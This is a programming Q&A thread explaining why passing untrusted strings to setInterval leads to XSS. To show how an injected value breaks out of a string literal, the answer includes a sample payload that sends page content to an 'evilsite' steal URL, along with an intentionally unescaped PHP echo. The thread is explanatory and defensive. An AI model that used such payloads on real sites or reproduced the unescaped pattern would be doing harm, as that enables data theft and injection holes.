# Why is setInterval not safe from XSS?

Tags: javascript, security, xss

I'm going through [OWASP Cross Site Scripting Prevent Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html). In rule #3 it says:

> Please note there are some JavaScript functions that can never safely use untrusted data as input - EVEN IF JAVASCRIPT ESCAPED!

```html
<script>
window.setInterval('...EVEN IF YOU ESCAPE UNTRUSTED DATA YOU ARE XSSED HERE...');
</script>
```

---

**To clarify:**

1. I know that using `setInterval` et al. *is* safe with your *own* content.
2. I know that one *must* validate, escape and/or sanitise external content.

---

My understanding is that rule #3 sorts of imply that an attacker can bypass any XSS filters you can think of if you use `setInterval`.

Do you have an example of what they mean? What kind of XSS attack you'll never be safe from using `setInterval`?

There is a similar question here: [.setinterval and XSS](https://stackoverflow.com/q/30718230/1244884) unfortunately the answer didn't help me.

Comment: `setInterval(userInput, 1000)` where `userInput = "alert('XSS')"`

Comment: "***never safely use untrusted data***"

Comment: `setInterval` isn't any different from `eval` when being passed a string…

Comment: Thanks everybody who shipped in so far. I clarified my question. @mplungjan I'm aware that one should "never safely use untrusted data". My question is about understanding why `setInterval` can _never_ be safe from XSS.

Comment: @customcommander if you invoke `setInterval` with a string you're opting into using `eval` on some input. If that input comes from the user you're opting into running whatever code the user wants into your application. User input is *never* to be trusted and always assumed unsafe. Since you're also elected to always treat it as runnable code, there is no amount of escaping that will ever protect you - you've consigned yourself to always be on the defensive. You plug one security hole, an attacker can exploit another. You're only reacting, never ever fully covered.

Comment: How does the [linked answer](https://stackoverflow.com/a/30718343) _not_ answer your question?

Comment: @Phil The answer links to a page on MDN and looking at it I cannot see a clear example of what OWASP means by this. Can you point me to the relevant section that I must have missed?

Comment: @customcommander I meant the text is referring to untrusted data used in an interval - I wanted to emphasise that setInterval/setTimeout are just fine with trusted data

Comment: "*EVEN IF JAVASCRIPT ESCAPED*" is false. Of course it's possible to properly escape user input to use as data in code snippets that are passed to `setInterval` or `eval`. It's just very hard to do properly, and mostly rather useless. (It's never a good idea to use user input as code itself, of course).

Comment: @Bergi I'd say that a user input that is sufficiently escaped to be run in `eval` is not worth running in `eval` since you most likely have a very restricted functionality exposed - enough to be able to prepare functions that a user can choose from and never have to enter as code. The actual "choice" might be in the form of a string that is tokenised/parsed for the correct functionality to be invoked but still.

Comment: @VLAZ Yes, exactly that's what I meant with "mostly rather useless"

Comment: @Bergi indeed. I was trying to give more context there for OP's benefit.

Answer (score 2):

Some background first:

Escaping to defend against XSS involves adding suitable escape characters so that rogue data can't break out of wherever you put it and be evaluated as JavaScript.

e.g. given user input of `xss' + window.location = "http://evilsite/steal?username=" + encodeURLComponent(document.getElementById("user-widget").textContent) + '`

If you inserted it into a string literal with server-side code:

```
const userinput = '<?php echo $_GET("userinput"); ?>'
```

You'd get:

```
const userinput = 'xss' + window.location = "http://evilsite/steal?username=" + encodeURLComponent(document.getElementById("user-widget").textContent) + ''`
```

Then the `'` would break out of the string literal in the JS, steal the username, and send it to the attacker's website. (There are worse things than usernames which could be stolen.

Escaping is designed to prevent the data from breaking out of the string literal like that:

```
const userinput = 'xss\' + window.location = \"http://evilsite/steal?username=\" + encodeURLComponent(document.getElementById(\"user-widget\").textContent) + \''`
```

So the attacking code just becomes part of the **string** and not **evaluated** as raw code.

---

The problem with passing a string to `setInterval` (or `setTimeout`, `new Function`, `eval`, etc) is that they are functions **designed to evaluate code**.

The attacker doesn't need to break out of the string literal to have their code executed. It's happening already.

---

> My question is about understanding why setInterval can never be safe from XSS.

That isn't what the warning you quoted said. It said it *can never safely use untrusted data as input*. If you're putting your own code there, it is perfectly safe. It is when you evaluate some user input that you have problems.

Passing a string to `setInterval` is a bad idea anyway. It is hard to debug and relatively slow.

Pass a function instead. You can even use user input safely then (since it isn't being evaluated as code, it is just a variable with a string in it).

```
const userinput = "properly escaped user input";

setInterval(() => {
    document.body.appendChild(
        document.createTextNode(userinput)
    );
}, 1000);
```

Comment: I know it's safe with your own code; do people XSS themselves with their own code? I guess some have managed to :-) I was just wondering why it was impossible to properly escape external code to make it safe to execute with `setInterval` et al. I find @Bergi comment helpful in that regard. Thanks for taking the time to write up an elaborate answer! It was useful too.

Comment: @customcommander "*do people XSS themselves with their own code?*" it's more of a problem that if you're using `eval` *maybe* you're only exposing the user to themselves (if you're lucky) but it's a security problem waiting to happen. Next year you decide to add something leverages the same functionality and ends up allowing users to run code *on other users' browsers*. Then you're in trouble. It's not really that hard to get a person to run code themselves "here copy/paste this and see what happens" can taint a low tech user's entire session.

Comment: @customcommander You may end up inadvertently running code from user A in user B's environment, too - e.g., via a bookmark, or loading something saved by user B, or many others. `eval` puts you on the defensive forever - not only do you have to always make sure you're not running bad code *now* but forever and ever in the future. A single otherwise innocent refactoring or change might end up exposing a security issue.